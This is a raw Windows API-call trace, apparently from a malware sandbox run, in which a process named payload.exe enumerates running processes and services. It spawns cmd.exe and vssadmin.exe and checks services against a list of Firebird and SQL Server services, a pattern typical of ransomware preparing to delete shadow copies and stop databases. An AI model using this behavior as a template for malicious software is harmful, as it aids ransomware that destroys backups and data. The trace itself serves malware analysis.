returned 21 [0034.827] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="philadelphia.exe")) returned 1 [0034.836] lstrlenW (lpString="philadelphia.exe") returned 16 [0034.838] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="litigation_rows_careers.exe")) returned 1 [0034.851] lstrlenW (lpString="litigation_rows_careers.exe") returned 27 [0034.853] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ict virginia cameras.exe")) returned 1 [0034.862] lstrlenW (lpString="ict virginia cameras.exe") returned 24 [0034.862] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x438, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fraud stuck.exe")) returned 1 [0034.862] lstrlenW (lpString="fraud stuck.exe") returned 15 [0034.862] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="innovative-essential-very.exe")) returned 1 [0034.863] lstrlenW (lpString="innovative-essential-very.exe") returned 29 [0034.863] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attended.exe")) returned 1 [0034.864] lstrlenW (lpString="attended.exe") returned 12 [0034.864] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tolerance-cartridges.exe")) returned 1 [0034.864] lstrlenW (lpString="tolerance-cartridges.exe") returned 24 [0034.864] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pan physician.exe")) returned 1 [0034.865] lstrlenW (lpString="pan physician.exe") returned 17 [0034.865] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="yesterday_sagem_indexes.exe")) returned 1 [0034.866] lstrlenW (lpString="yesterday_sagem_indexes.exe") returned 27 [0034.866] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="graphsheadlinehull.exe")) returned 1 [0034.866] lstrlenW (lpString="graphsheadlinehull.exe") returned 22 [0034.866] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="over-celebrity.exe")) returned 1 [0034.867] lstrlenW (lpString="over-celebrity.exe") returned 18 [0034.867] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0034.868] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0034.868] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0034.868] lstrlenW (lpString="dllhost.exe") returned 11 [0034.868] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x944, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0034.869] lstrlenW (lpString="dllhost.exe") returned 11 [0034.869] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 1 [0034.870] lstrlenW (lpString="payload.exe") returned 11 [0034.870] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x970, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x964, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0034.870] lstrlenW (lpString="cmd.exe") returned 7 [0034.870] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x988, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0034.871] lstrlenW (lpString="conhost.exe") returned 11 [0034.871] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x970, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0034.879] lstrlenW (lpString="vssadmin.exe") returned 12 [0034.879] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0034.879] lstrlenW (lpString="VSSVC.exe") returned 9 [0034.879] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 0 [0034.880] CloseHandle (hObject=0x19c) returned 1 [0034.880] Sleep (dwMilliseconds=0x1f4) [0035.630] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x626910 [0035.850] EnumServicesStatusExW (in: hSCManager=0x626910, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 0 [0035.851] GetLastError () returned 0xea [0035.851] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x123e) returned 0x385af18 [0035.851] EnumServicesStatusExW (in: hSCManager=0x626910, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x385af18, cbBufSize=0x123e, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x385af18, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 1 [0035.852] CloseServiceHandle (hSCObject=0x626910) returned 1 [0035.852] lstrlenW (lpString="Appinfo") returned 7 [0035.852] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0035.852] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0035.852] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0035.852] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0035.853] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0035.853] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0035.853] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0035.853] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0035.853] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0035.853] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0035.853] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0035.853] lstrlenW (lpString="AudioSrv") returned 8 [0035.853] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0035.853] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0035.853] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0035.853] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0035.853] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0035.853] lstrlenW (lpString="BFE") returned 3 [0035.853] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0035.853] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0035.853] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0035.853] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0035.853] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0035.853] lstrlenW (lpString="CryptSvc") returned 8 [0035.853] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0035.853] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0035.853] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0035.853] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0035.853] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0035.853] lstrlenW (lpString="CscService") returned 10 [0035.853] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0035.853] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0035.853] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0035.853] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0035.853] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0035.854] lstrlenW (lpString="DcomLaunch") returned 10 [0035.854] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0035.854] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0035.854] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0035.854] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0035.854] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0035.854] lstrlenW (lpString="Dhcp") returned 4 [0035.854] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0035.854] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0035.854] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0035.854] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0035.854] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0035.854] lstrlenW (lpString="Dnscache") returned 8 [0035.854] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0035.854] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0035.854] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0035.854] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0035.854] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0035.854] lstrlenW (lpString="DPS") returned 3 [0035.854] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0035.854] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0035.854] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0035.854] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0035.854] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0035.854] lstrlenW (lpString="eventlog") returned 8 [0035.854] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0035.854] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0035.854] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0035.854] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0035.854] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0035.854] lstrlenW (lpString="EventSystem") returned 11 [0035.854] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0035.855] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0035.855] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0035.855] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0035.855] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0035.855] lstrlenW (lpString="gpsvc") returned 5 [0035.855] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0035.855] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0035.855] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0035.855] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0035.855] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0035.855] lstrlenW (lpString="iphlpsvc") returned 8 [0035.855] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0035.855] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0035.855] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0035.855] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0035.855] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0035.855] lstrlenW (lpString="LanmanServer") returned 12 [0035.855] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0035.855] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0035.855] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0035.855] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0035.855] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0035.855] lstrlenW (lpString="LanmanWorkstation") returned 17 [0035.855] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0035.855] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0035.855] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0035.855] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0035.855] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0035.855] lstrlenW (lpString="lmhosts") returned 7 [0035.855] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0035.855] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0035.855] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0035.856] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0035.856] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0035.856] lstrlenW (lpString="MMCSS") returned 5 [0035.856] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0035.856] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0035.856] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0035.856] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0035.856] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0035.856] lstrlenW (lpString="MpsSvc") returned 6 [0035.856] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0035.856] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0035.856] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0035.856] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0035.856] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0035.856] lstrlenW (lpString="Netman") returned 6 [0035.856] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0035.856] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0035.856] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0035.856] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0035.856] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0035.856] lstrlenW (lpString="netprofm") returned 8 [0035.856] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0035.856] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0035.856] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0035.856] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0035.856] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0035.856] lstrlenW (lpString="NlaSvc") returned 6 [0035.856] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0035.856] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0035.856] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0035.856] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0035.856] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0035.857] lstrlenW (lpString="nsi") returned 3 [0035.857] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0035.857] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0035.857] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0035.857] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0035.857] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0035.857] lstrlenW (lpString="PcaSvc") returned 6 [0035.857] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0035.857] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0035.857] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0035.857] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0035.857] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0035.857] lstrlenW (lpString="PlugPlay") returned 8 [0035.857] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0035.857] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0035.857] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0035.857] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0035.857] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0035.857] lstrlenW (lpString="Power") returned 5 [0035.857] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0035.857] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0035.857] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0035.857] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0035.857] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0035.857] lstrlenW (lpString="ProfSvc") returned 7 [0035.857] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0035.857] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0035.857] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0035.857] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0035.857] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0035.857] lstrlenW (lpString="RpcEptMapper") returned 12 [0035.857] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0035.858] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0035.858] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0035.858] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0035.858] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0035.858] lstrlenW (lpString="RpcSs") returned 5 [0035.858] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0035.858] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0035.858] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0035.858] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0035.858] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0035.858] lstrlenW (lpString="SamSs") returned 5 [0035.858] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0035.858] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0035.858] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0035.858] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0035.858] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0035.858] lstrlenW (lpString="Schedule") returned 8 [0035.858] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0035.858] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0035.858] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0035.858] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0035.858] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0035.858] lstrlenW (lpString="SENS") returned 4 [0035.858] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0035.858] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0035.858] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0035.858] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0035.858] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0035.858] lstrlenW (lpString="ShellHWDetection") returned 16 [0035.858] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0035.858] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0035.858] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0035.859] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0035.859] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0035.859] lstrlenW (lpString="Spooler") returned 7 [0035.859] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0035.859] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0035.859] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0035.859] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0035.859] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0035.859] lstrlenW (lpString="SysMain") returned 7 [0035.859] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0035.859] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0035.859] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0035.859] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0035.859] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0035.859] lstrlenW (lpString="Themes") returned 6 [0035.859] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0035.859] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0035.859] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0035.859] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0035.859] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0035.859] lstrlenW (lpString="TrkWks") returned 6 [0035.859] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0035.859] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0035.859] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0035.859] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0035.859] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0035.859] lstrlenW (lpString="UxSms") returned 5 [0035.859] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0035.859] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0035.859] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0035.859] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0035.859] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0035.860] lstrlenW (lpString="VSS") returned 3 [0035.860] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 